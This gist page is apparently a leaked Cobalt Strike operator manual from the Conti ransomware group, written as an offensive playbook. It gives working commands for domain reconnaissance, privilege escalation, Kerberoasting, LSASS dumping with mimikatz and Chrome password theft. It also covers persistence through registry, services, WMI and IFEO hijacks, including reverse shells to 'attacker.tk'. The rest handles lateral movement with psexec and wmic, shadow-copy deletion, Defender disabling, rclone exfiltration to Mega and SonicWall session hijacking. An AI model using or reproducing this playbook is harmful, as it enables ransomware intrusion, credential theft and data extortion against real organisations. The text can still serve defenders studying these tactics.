Skip to content

Instantly share code, notes, and snippets.

@insi2304
Created August 17, 2022 04:58
Show Gist options
  • Save insi2304/e61c1470c364894b1ea99f75b8b9ef10 to your computer and use it in GitHub Desktop.
Save insi2304/e61c1470c364894b1ea99f75b8b9ef10 to your computer and use it in GitHub Desktop.
CS manual Conti
MANUAL COBALT STRIKE
!------------------------------------------------- --Standard Commands---------------------------------------------- -----!
Creating a load
Attacks->Packages->
interact - choose an agent
help -> will show a list of commands
help [command] will show help for a specific command
!------------------------------------------------- ----Collecting information AD---------------------------------------------------- -------!
!---Getting a Domain Controller---!
net domain_controllers
net dclist
shell nltest /dclist
!---Getting a list of computers---!
shell net group "Domain Computers" /domain
net computers
net view
Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem !--Test--!
!---Getting a list of subdomains---!
net domain_trusts
shell nltest /DOMAIN_TRUSTS
!---Getting a list of groups and users---!
shell net group "domain Admins" /domain - list of Domain admins ; for Germans - shell net group "Domänen-Admins" /domain
shell net group "Enterprise Admins" /domain - Enterprise admins
shell net group "domain users" /domain - list Domain users
net group
net local group
net user
!---Additionally---!
net domain|systeminfo | findstr /B "Domain" - Show which domain the PC is in
net sessions - Show active sessions on PC
net time - Show time on PC
net logons - Shows lists of users logged into the PC
!---Getting ShareFinder---!
net share - Show share list on PC
We collect available Shares and see if there are any $ADMIN shares available for our current user in the domain.
- powershell-import /opt/PowerSploit-dev/Recon/PowerView.ps1
-powershell Invoke-ShareFinder -CheckShareAccess -Verbose
Analog:
- powershell-import /opt/PowerSploit-dev/Recon/ShareFinder.ps1
- psinject 4728 x86 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt
(at the moment, the scan has gone and its result is being written to a file, the file will be fully sized when the scan is over and it can be downloaded)
Also, do not forget to look at the processes using the ps command, you can find the user there, migrate to his process> Explore> Process list> then select the process of another user.
After migrating to a new user, you also need to remove the balls to see where you can break through with him
When you remove the shares, then at the end of the removal to the C:\ProgramData directory and there is sh.txt or shares.txt , download, see how many "remote admin" are in the text box, if there are more than one, then this means that there is access to another computer
!---Additional tool---!
!-Collecting information about the composition of the Active Directory using AdFind.exe-!
- load adfind.exe and adf.bat into a writable folder
- move Cobalt Strike beacon to this folder
- run shell adf.bat
- wait for the script to finish
- download the result and delete what was loaded on the machine
adf.bat content:
adfind.exe -f "(objectcategory=person)" > ad_users.txt
adfind.exe -f "objectcategory=computer" > ad_computers.txt
adfind.exe -f "(objectcategory=organizationalUnit)" > ad_ous.txt
adfind.exe -sc trustdmp > trustdmp.txt
adfind.exe -subnets -f (objectCategory=subnet)> subnets.txt
adfind.exe -f "(objectcategory=group)" > ad_group.txt
adfind.exe -gcb -sc trustdmp > trustdmp.txt
!-Collecting information on the current car using SeatBelt-!
- execute-assembly /opt/cobalt_strike_extension_kit/exe/Seatbelt.exe -group=all -outputfile="C:\ProgramData\textinfo.txt"
(I don’t give explanations here, the number of checks there is decent and all the information collected is more or less important both on the local machine and on the network)
!-----------------------------------------------------------Methods of privilege escalation- ----------------------------------------------------!
!---Use exploits---!
shell systeminfo - Get information about the system.
The information received must be written to a text file (win10-systeminfo.txt)
Use Windows-Exploit-Suggester, it will show you roughly what exploits to use.
!---Updating exploits database---!
/windows-exploit-suggester.py --update
[*] initiating...
[*] successfully requested base url
[*] scraped ms download url
[+] writing to file 2021-03-09-mssb.xls
[*]done
!---Run the program to detect exploits---!
./windows-exploit-suggester.py --database 2021-03-09-mssb.xls --systeminfo win10-systeminfo.txt
Further, according to the list of exploits that issued Windows-Exploit-Suggester, we use it on the machine. (But before that, it’s better to read about the exploit you want to use, it may not be suitable for your goal, pay special attention to the OS version and its bit depth.)
For example:
Option number 1:
elevate ms16-135 [listener] - the command uses exploit ms16-135 and, if successful, will invoke a new session from under SYSTEM.
Option number 2:
For example, let's go to this directory C:\Users\User1\Pictures (you can go to any other directory, the main thing is that you can download the load)
Loading your load upload artifact.exe|dll|One-liner
runasadmin ms16-032 (Specify directory) artifact.exe [Option if needed] command uses exploit ms16-032 to run your load from under SYSTEM. In this case, you will receive a new agent from under SYSTEM.
!---SharpUp---!
SharpUp is a misconfiguration scanner for privilege escalation.
Doing a scan:
- execute-assembly /opt/cobalt_strike_extension_kit/exe/SharpUp.exe
Sample output (Maybe there is nothing to find):
=== SharpUp: Running Privilege Escalation Checks ===
=== Modifiable Services ===
Name :VMtools
DisplayName :VMware Tool
Discription : Provides support for synchronizing objects between the host and qwest operation system.
State :Stopped
StartMode :Auto
PathName :C:\Program Files\VMware\VMware Tools\vmtoolsd
=== Modifiable Service Binaries ===
===AlwaysInstallElevated Registry Keys===
=== Modifiable Folders in %PATH% ===
=== Modifiable Registry Autoruns ===
=== *Special* User Privileges ===
=== Unattended Install Files ===
=== McAfee Sitelist.xml Files ===
=== Cached GPP Password ===
We see that our user can modify the VMtools service in order to start the load.
Go to Attacks --> WindowsExecutable (S) --> select our [Listener] and output Windows Service EXE --> Generate -->FileName:vmtoolsd.exe --> Save
Next, let's move to any directory, for example: C:\Users\User1\Pictures and load our load.
Now we modify the service:
run sc config vmtoolsd binpath=C:\Users\User1\Pictures\vmtoolsd.exe
run start vmtoolsd.exe
After that, the agent from under SYSTEM should come.
!------------------------------------------------ Obtaining hashes and passwords--- ----------------------------------------------------!
(CAN BE EXECUTED WITHOUT PRIVILEGES)
!----kerberoast attack - getting hashes from memory---!
We carry out a kerberoast attack:
- execute-assembly /opt/cobalt_strike_extension_kit/exe/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt
- execute-assembly /opt/cobalt_strike_extension_kit/exe/Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt
- download the resulting files (if they gave the result)
- if not issued, then we use an alternative powershell script to carry out the attack:
- powershell-import /opt/PowerSploit-dev\Recon\PowerView.ps1
Analog:
- powershell-import /opt/PowerSploit-dev\Recon\Invoke-Kerberoast.ps1
- psinject 4728 x86 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -encoding UTF8
4728 in this case is the current pid, and x86 is its bit depth
(received hashes will be sent to brute to get cleartext passwords or will be used in the context of SYSTEM rights)
We collect information from the Chrome browser
- execute-assembly /opt/cobalt_strike_extension_kit/exe/SharpChrome.exe logins /showall
(here we get a set of passwords for the current user and some idea of ​​the network and external resources where he goes)
Checking for saved passwords in domain group policy files
- execute-assembly /opt/cobalt_strike_extension_kit/exe/Net-GPPPassword.exe
Analog:
- powershell-import /opt/PowerSploit-dev/Exfiltration/Get-GPPPassword.ps1
(ONLY WITH PRIVILEGED RIGHTS*)
If we have PRIVILEGED rights, we can get hashes and passwords using "hashdump" and "logonpasswords" commands. This is a quick way to get passwords, but it might not work. For example, AV interferes.
It's better to do this:
- Run ps and find the LSASS.exe process (It stores our passwords). Remember the PID.
- Make it a dump.
Let's go to the beacon:
- cd Windows
- shell rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\Users\User1\lsass.dmp full
- In the PID parameter, specify the PID number of LSASS.exe
- You can use any directory where writing is allowed, for example: C:\Users\User1\lsass.dmp
Analog:
- execute-assembly /opt/cobalt_strike_extension_kit/exe/SharpDump.exe
When you make a dump, download it.
Once downloaded, open mimikatz on your machine and run the following commands. (lsass.dmp put in mimikatz folder)
sekurlsa::minidump lsass.dmp
securlsa::logonPasswords
!------------------------------------------------- -----Persistence---------------------------------------------------- ---------!
(CAN BE EXECUTED WITHOUT PRIVILEGES)
Create explorers.bat and add this code (do not copy the brackets):
}
@echo off
set fullname=C:\Temp\explorers.exe
set prog=explorers.exe
:begin
tasklist /fi "IMAGENAME eq %prog%"|>nul find "%prog%"||start "" "%fullname%"
>nul ping 127.1 -n 6
goto :begin
}
Next, load our explorers.exe load and explorers.bat batch file to any directory where you can write files, for example: "C:\Users\User1\Pictires"
Next, open CS and open our beacon and go to the folder where we uploaded our files
We execute the command (It will hide our files):
shell attrib +h [explorers.exe]
shell attrib +h [explorers.bat]
Next, add the keys to the registry:
shell reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v explorers /t REG_SZ /d "C:\Temp\explorers.exe"
shell reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v explorers /t REG_SZ /d "C:\Temp\explorers.bat"
Examination:
shell reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /s
-------------------------------------------------- -------------------------------------------------- --------------------------------
You can use powershell stager, but if you run as a normal user, then the cmd window will appear on the desktop and immediately close
{
@echo off
set fullname=powershell.exe
set paramtr= powershell -nop -w hidden -encodedcommand...(your stager)
setprog=powershell.exe
:begin
tasklist /fi "IMAGENAME eq %prog%"|>nul find "%prog%"||start "" "%fullname%" "" "%paramtr%"
>nul ping 127.1 -n 6
goto :begin
}
Next, add the key to the registry:
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v explorers /t REG_SZ /d "C:\Temp\explorers.bat"
Examination:
reg Query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /s
Also, the key in the registry can be written to this directory reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, but to create a key in this directory you need PRIVILEGE RIGHTS *
!---In-memory---!
The introduction of a backdoor that will hang in RAM makes sense if you need to gain a foothold on the target machine without leaving any traces. Antiviruses usually have little control over memory activities, as this is associated with a large additional resource consumption. Even an experienced user is unlikely to notice something that is hidden inside a legal process.
We will use meterpreter as an in-memory backdoor. This is perhaps the most famous RAT, capable of operating exclusively in memory without touching the disk.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=8888 -f raw -o meter32.bin exitfunc=thread StagerRetryCount=999999
cmd$> inject_windows.exe PID meter32.bin
We pay for maximum secrecy with the loss of persistence after a reboot.
Since the malicious thread is running outside of any library, Procexp often shows such a thread as running from address zero.
office
This method is suitable if the attacked user often works with the office suite. Not so rare!
reg add "HKCU\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d C:\users\username\meter.dll
Pros: Survives reboot, any user will do.
Cons: Unmanaged startup interval.
(ONLY WITH PRIVILEGED RIGHTS*)
!--- Pinning through the "Task Scheduler"---!
Fixing through the Task Scheduler will be done through the import of our finished xml.
1) run the finished Python script, and generate xml.
This script will require you to enter several parameters:
- start programm - this is what will run this task, powershell.exe | artifact.exe | rundll32.exe
- stager PowerShell or other parameters - parameters passed to the program to run, for powershell.exe - stager PowerShell, artifact.dll [Parameter]
- date registration task - task registration date, you can look at another task you want to disguise as.
- date end task - end date of the task
- time repeat task in day - after how long the task will be repeated, "PT3M" - every 3 minutes; "PT1R" - every hour; if the program is running, the task will not start a new program session.
- name_xml - name of your xml, use names like: Adobe Update, WindowsDefender, etc...
After that, the required xml is generated. Next, we download it to the client PC on which we want to gain a foothold.
After that, we go to the directory where we loaded our xml and enter the command in the beacon:
shell schtasks /Create /RU SYSTEM /XML Security_Update.xml /TN WinDefender
After that, we delete xml, we no longer need it.
rm Security_Update.xml
!---Services---!
Use services for persistence, as Service Manager will automatically restart the service if needed.
shell sc create persistence binPath= "nc.exe -e \windows\system32\cmd.exe attacker.tk 8888" start= auto
shell sc failure persistence reset= 0 actions= restart/60000/restart/60000/restart/60000
shell sc start persistence
Pros: Survives reboot, manageable startup interval, any user is fine.
Minus: administrator rights are required.
!---Configs---!
Organizing persistence by changing the OS configuration is a great way to hide from antivirus. This is the only case where we don't use any executable code at all. But this only applies if we have direct access to the target machine.
Creating a hidden user on behalf of which you can then get remote access is perhaps the most famous variant of such an attack.
net user attacker p@ssw0rd /add
net localgroup administrators /add attacker
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v attacker /t REG_DWORD /d 0 /f
Easy and efficient bookmark injection in Windows via RDP:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t reg_sz /d "\windows\system32\cmd.exe"
reg add "HKLM\system\currentcontrolset\control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0x0 /f
Pros: hard to detect by antivirus, survives reboots.
Cons: Requires administrator/root rights, not suitable if machine is behind NAT or firewall.
!---Debugger---!
If the attacker knows that the attacked user often launches some program, say a calculator, then he can inject his code into the body of this program using a joiner. However, any intervention in executable files inexorably increases the level of mistrust towards them on the part of the antivirus. A much more elegant implementation would be to intercept the launch:
copycalc.exe _calc.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe" /v Debugger /t reg_sz /d "cmd /C _calc.exe & c:\windows\nc.exe -ec: \windows\system32\cmd.exe attacker.tk 8888" /f
Once the victim starts and then closes the calculator, the attacker will accept a reverse shell.
Plus: survives a reboot.
Cons: Requires admin rights.
!---Gflags---!
In much the same way, you can organize your code to run when the user closes a certain program.
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "nc -e \windows\system32\cmd.exe attacker.tk 8888"
Plus: survives a reboot.
Cons: Requires admin rights.
Autoruns does not detect this method, but you can check the registry branch:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit
!---WMI---!
A fairly reliable way to autorun is through WMI events. We can launch the backdoor at regular intervals.
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="persistence", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="persistence", ExecutablePath="C:\users\admin\meter.exe",CommandLineTemplate="C:\users\admin\meter.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="persistence"", Consumer="CommandLineEventConsumer.Name="persistence""
Pros: Survives reboot, manageable startup interval.
Cons: Requires admin rights.
!---AppInit---!
Windows has an interesting way to inject libraries into windowed applications using AppInit (they should use user32.dll).
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t reg_dword /d 0x1 /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t reg_sz /d "c:\path\to\meter64.dll" /f
reg add "HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t reg_dword /d 0x1 /f
reg add "HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t reg_sz /d "c:\path\to\meter32.dll" /f
Plus: survives a reboot.
Cons: Requires admin rights, unmanaged startup interval.
!---Lsass---!
Another possibility is to register the library in the lsass system process. This is a rather advantageous place, since this process stores the very accounts that we extract with the mimikatz utility.
reg add "HKLM\system\currentcontrolset\control\lsa" /v "Notification Packages" /t reg_multi_sz /d "rassfm\0scecli\0meter" /f
Plus: survives a reboot.
Cons: Requires admin rights, unmanageable startup interval, can kill the system.
!---Winlogon---!
To open a shell every time a user logs in, you can use the Winlogon mechanism.
reg add "HKLM\software\microsoft\windows nt\currentversion\winlogon" /v UserInit /t reg_sz /d "c:\windows\system32\userinit.exe,c:\windows\meter.exe"
Plus: survives a reboot.
Cons: Unmanaged startup interval.
!---Netsh---!
The Netsh network configuration utility also allows you to load an arbitrary library. This opens up the possibility of organizing an impromptu autoload through it. The result will look innocuous, since the Windows system component is initially called.
cmd#> c:\windows\syswow64\netsh.exe
netsh> add helper c:\windows\meter32.dll
cmd#> reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v persistence /t REG_SZ /d "C:\Windows\SysWOW64\netsh.exe"
As a result, we get the following chain: autorun → netsh.exe → meter.dll.
In this case, meter.dll will be hidden from the user's eyes - he will only see the launch of legitimate Netsh, a native Windows component.
Pros: survives a reboot, hard to detect by the user.
Cons: Requires admin rights.
!------------------------------------------------- ---Lateral Movement--------------------------------------------------- ------!
If we managed to get the login and password of the user on the victim's PC, we do spawnas Domain\Admin Password [listener], a new agent will come, the process will be launched under this user.
If we found the login \ password of the admin or user domain, we can take his token, the command looks like this
- make_token Domain\Admin Pass
if you want to remove the token, the command:
-rev2self
Go to the menu Cobalt Strike-->Visualization-->Target Table or click on the target icon.
This is where your targets will be located after you do (net dclist, net domain_controllers, net computers, portscan)
Right-click on the PC you want to jump to-->Jump:
psexec
psexec64
psexecpsh
ssh
ssh key
winrm
winrm64
If the agent has a system process, you can elevate system rights using the getsystem command.
If we found the username and hash of the user and at the same time we could not decrypt the hash, we issue the following command pth Domain\Admin hash [command]
(Privileged rights are needed), using the commands:
-shell dir\\ip
- hostname\c$
check access to the server or regular PCs.
If there is access, then click on the session> File Browser> write the path \\ip or the name of the computer to which you have access \c$ , load the load there
shell wmic /node:[ip] process call create "rundll32.exe C:\Temp\artifact.dll StartW"
shell wmic /node:[ip] process call create "C:\Temp\artifact.exe"
!------------------------------------------------- -Attacks------------------------------------------------ -------------!
!--BAT--!
always run everything as Administrator:
uac - removes the pop-up window asking permission to run from the admin
defoff - kill defender (does not work on everything, after that we check the presence of the Mspeng process in taskmgr)
RDP - raises port 3389
del - delete Shadow copy (requests permission to delete, press - y)
NS - mount hidden system drives (pass:98) !! use after demolition AB
NLA+BACK - fixes NLA+backdoor for passwordless login, works like this:
in the login window (where it asks to enter credits) - press win + Y, a cmd window pops up
write taskmgr, open the users tab, RMB on any user - connect
ps - does not work on dozens \ requires a pass
COLLECTING A BAT MANUAL TO COPY A FILE OVER THE WHOLE DOMAIN
start PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c COPY "\\PRIMARY DOMAIN CONTROLLER\share$\fx166.exe" "C:\windows\temp\ "
SAVE AS "COPY.BAT"
COLLECTING A BAT FILE TO LAUNCH A FILE Across THE WHOLE DOMAIN
start PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /cc:\windows\temp\fx166.exe
SAVE AS "EXE.BAT"
COLLECTING A WMI BATTERY TO COPY AND RUN THE FILE Across THE WHOLE DOMAIN
start wmic /node:@C:\share$\comps1.txt /user:"DOMAIN\Administrator" /password:"PASSWORD" process call create "cmd.exe /c bitsadmin /transfer fx166 \\DOMAIN CONTROLLER\share$\ fx166.exe %APPDATA%\fx166.exe&%APPDATA%\fx166.exe"
!------------------------------------------------- -------RDP------------------------------------------------ ------------------!
IF RDP IS VERY NEEDED IN LOCAL LAN :: HOW NOT TO SLEEP ::
1. Select the server OS, ping, found. Making a listing of dira
`ls \\REMOTE-HOSTNAME\C$\Users`
Sort by Modified. Where there is a fresh touch - it is DEFINITELY IMPOSSIBLE to go under these users because the following situation will easily arise - you go in, download balls / test something and suddenly this user comes to this PC and sees your work results ... Detect. Cleaning. End of the game.
To do this, select the user who went to this server last year, say.
Do you think the mechanics are clear?
2. Selecting a user from YES that hangs in YES but is almost never used
shell net group "Domain Admins" /domain
This is a list of our YES
Next, on the user, we take turns removing the information
`shell net user Administrator /domain`
We are looking for the Last Logon line - that is, when you logged in to the network for the last time (on any of the PCs in the grid)
If there is a date like the month before last, half a year or finally a year - excellent. This is what we need. Most likely, this is either a service account or an admin to which they do not go, and it definitely will not interfere with your RDP.
Such simple tricks will help you not to sleep stupidly on the RDP
3. We do not sit on the RDP, after we have finished - we do Logoff (MANDATORY). Not to be confused with simply closing the RDP window.
!---------------------------------------------Additional material-- -------------------------------------------------- ---!
!---RCLONE MANUAL--!
1. download rclone from the site., create a file rclone.conf and put it in the same folder with exe
2. then open cmd as administrator, go to the folder where the program with the configuration file is located and execute the command: rclone config
3. then a menu pops up in which we create a config (roughly speaking, we enter the login and password of the mega), after the credits have been entered, the program writes them to the rclone.conf file, in encrypted form.
4. we take the received rclone.conf file and the program itself and put it on the host from which we are going to pull the information, of course it’s better to put it in a secluded place
5. Go to CS beacon to the folder where you put the config and the program and execute the command:
shell rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
remote:Data - change only this.
"remote" is the name of your mega.
"NT" is your directory in the mega where it will be downloaded, if it does not exist, it will create it itself.
well, here I think it’s clear that what’s in quotes is what we’re extorting, we can specify it as you like, even the entire disk
remote - the name of the config, which we specified when performing step 3, data - the folder in the mega where the info is uploaded
!---SonicWall---!
for those who need to work with SonicWall through browser sessions
Using a Web Browser to Access
- take the session from the script output, for example "47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg="
- open the browser in incognito mode, open the developer console (js-console)
- encode the session ID in base64
>> btoa("47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=") [ENTER]
"NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0="
- drive in the URL https://target (redirect to https://target/cgi-bin/welcome)
- go to the console in application/cookies, add a cookie
swap : NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0=
- in the browser (where .../cgi-bin/welcome) edit the URL to https://target/cgi-bin/portal
- get access to the resource under the user session
!---Installing and configuring Citrix---!
----------------------------------
Windows 7 or Windows 10
Na nee Internet Explorer 11 or google chrome
After ustanovki braruzera nastraivaem Citrix Workspace
For win 7: https://www.citrix.com/en-gb/downloads/workspace-app/legacy-workspace-app-for-windows-ltsr/workspace-app-for-windows-1912-ltsr-cu2. html
For win10: https://www.citrix.com/en-gb/downloads/workspace-app/windows/workspace-app-for-windows-latest.htmlhttps://www.citrix.com/en-gb/downloads /workspace-app/windows/workspace-app-for-windows-latest.htmla win 10:
https://www.citrix.com/en-gb/downloads/workspace-app/windows/workspace-app-for-windows-latest.html
Install citrix
Dalee v brauzere vhodim v web-interface citrixa, vvodim login-pass potom zapuskaem deesktop (otkroetsya libo v browsere or v citrixAPP)
posle vhoda v desktop - podtyagivaem agenta v CS
!------------------------------------------------- -----Questions---------------------------------------------------- --------------!
14) If you find some kind of password, you can also run it through smb_login - this is a tool in metasploit, I will issue a metasploit and tell you how to use it. smb_login will show to which servers or workers, there is access with these credits
How to sort collected AD from the network
1) Download FileZilla
2) Download Putty, run Putty through Tor
Go here https://www.torproject.org/download/tor/
Download ATTENTION Expert Bundle
Unzip, go to the Tor directory and run tor.exe
After a few seconds, it will reach the writing of 100% Done
In the Putty settings, go to the proxy, set socks5, ip 127.0.0.1 port 9050
3) We go through filezilla to the server > go to the "Script" directory - put the AD files next to the script
4) Go to Putty, go to the server, go to the directory where the script is, give the command
./script.sh
5) Done, go back to FilleZilla and pick up our sorted. After yourself, be sure to delete the AD files and the sorted folder, if the sorted folder is not deleted, just change it to any name
manual on USERHANTER with the help of it, we find these cars. We also need ad_users to get the SID from there for the golden ticket, but more on that later
. make a list of targets
1.1 Open ad_users, look for someone who is potentially interesting to us: admin / engineer / inform technologists / IT
we take account logins from sAMAccountName
1.2 We take a list of domain admins
1.3 put the first and second in the list.txt file
2. Appload power view.
2.1 powershell-import _/home/user/soft/powerview/view.ps1_
2.1 --comment: import power view from /home/user/soft/powerview/view.ps1
2.3 Turn on hunting
2.3.1
psinject 1884 x64 Invoke-UserHunter -Threads 20 -UserFile C:\ProgramData\list.txt >> C:\ProgramData\out.txt
instead of 1884 - the PID of the process where we have enough rights to inject.
x64 - or x86 bit depth of the process. see tasklist
In c\programdata\list.txt there should be a list that we did in point No. 1.
after 5-10-20 minutes, watch the result in out.txt. As soon as he finishes, he replenishes it at once. that is, if the file is 0 bytes, it means it works or AB burned (if you burned av, you will see in the box)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment